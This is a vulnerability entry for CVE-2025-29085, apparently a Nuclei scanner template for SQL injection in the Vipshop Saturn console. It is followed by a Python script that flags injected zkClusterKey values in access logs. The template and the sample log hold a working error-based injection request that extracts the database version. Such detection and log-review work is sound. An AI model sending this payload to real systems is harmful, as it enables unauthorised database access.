Vulnerability Description
A SQL injection vulnerability in vipshop Saturn v.3.5.1 and before allows a remote attacker to execute arbitrary code via the /console/dashboard/executorCount?zkClusterKey component.
id: CVE-2025-29085

info:
  name: Vipshop Saturn Console <= 3.5.1 - SQL Injection via ClusterKey Component
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    SQL injection vulnerability in vipshop Saturn v.3.5.1 and before allows a remote attacker to execute arbitrary code via /console/dashboard/executorCount?zkClusterKey component.
  reference:
    - https://github.com/advisories/GHSA-49v8-p6mm-3pfj
    - https://gist.github.com/Cafe-Tea/bcef0d7a2bdb5ec8e0d69de852fdc900
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-29085
    cwe-id: CWE-89
    epss-score: 0.04135
    epss-percentile: 0.88143
  metadata:
    verified: true
  tags: cve,cve2025,vipshop,sqli,vkev,vuln

http:
  - raw:
      - |
        GET /console/dashboard/executorCount?zkClusterKey=1%27-extractvalue(1,concat(0x0a,version()))--%20- HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "java.sql.SQLException: XPATH syntax error: '"

    extractors:
      - type: regex
        part: body
        internal: true
        name: version
        group: 1
        regex:
          - "XPATH syntax error: '\\\\n(.*?)'"

      - type: dsl
        dsl:
          - '"Database Version: " + version'
# digest: 490a004630440220632bea9179867a6de3d635672cec7705bdc242fb15d305bea04e74cdb89c3bef02204737a6c8fe3116c810356b1d27c955a2c5772d03b556ab36262dea32d81a78ce:922c64590222798bb761d5b6d8e72950
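
For log review on the defending side, the following added example (not part of the template or of the Saturn project) scans access-log lines for requests to the endpoint above whose decoded zkClusterKey value falls outside a character allowlist. The allowlist, the Combined Log Format layout, the function name and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

ENDPOINT = "/console/dashboard/executorCount"
# Assumption: legitimate cluster keys contain only these characters.
SAFE_KEY = re.compile(r"[A-Za-z0-9_.:/-]{1,128}")
# Request field of a Combined Log Format line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def suspicious_requests(log_lines):
    """Return (client_ip, decoded_value) for each request to ENDPOINT whose
    zkClusterKey parameter does not match the allowlist."""
    hits = []
    for line in log_lines:
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if url.path.rstrip("/") != ENDPOINT:
            continue
        # parse_qs percent-decodes values, so %27 is compared as a quote.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("zkClusterKey", []):
            if not SAFE_KEY.fullmatch(value):
                hits.append((line.split(" ", 1)[0], value))
    return hits


# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Apr/2025:10:00:00 +0000] '
    '"GET /console/dashboard/executorCount?zkClusterKey=cluster1 HTTP/1.1" 200 52',
    '198.51.100.7 - - [01/Apr/2025:10:00:05 +0000] '
    '"GET /console/dashboard/executorCount?zkClusterKey='
    '1%27-extractvalue(1,concat(0x0a,version()))--%20- HTTP/1.1" 200 310',
    '192.0.2.10 - - [01/Apr/2025:10:00:09 +0000] '
    '"GET /console/other?zkClusterKey=a%27b HTTP/1.1" 404 12',
]

if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} sent non-allowlisted zkClusterKey: {value!r}")
```

Allowlisting on the decoded value avoids chasing individual SQL keywords, and the same check applies as input validation in front of the console until it is upgraded.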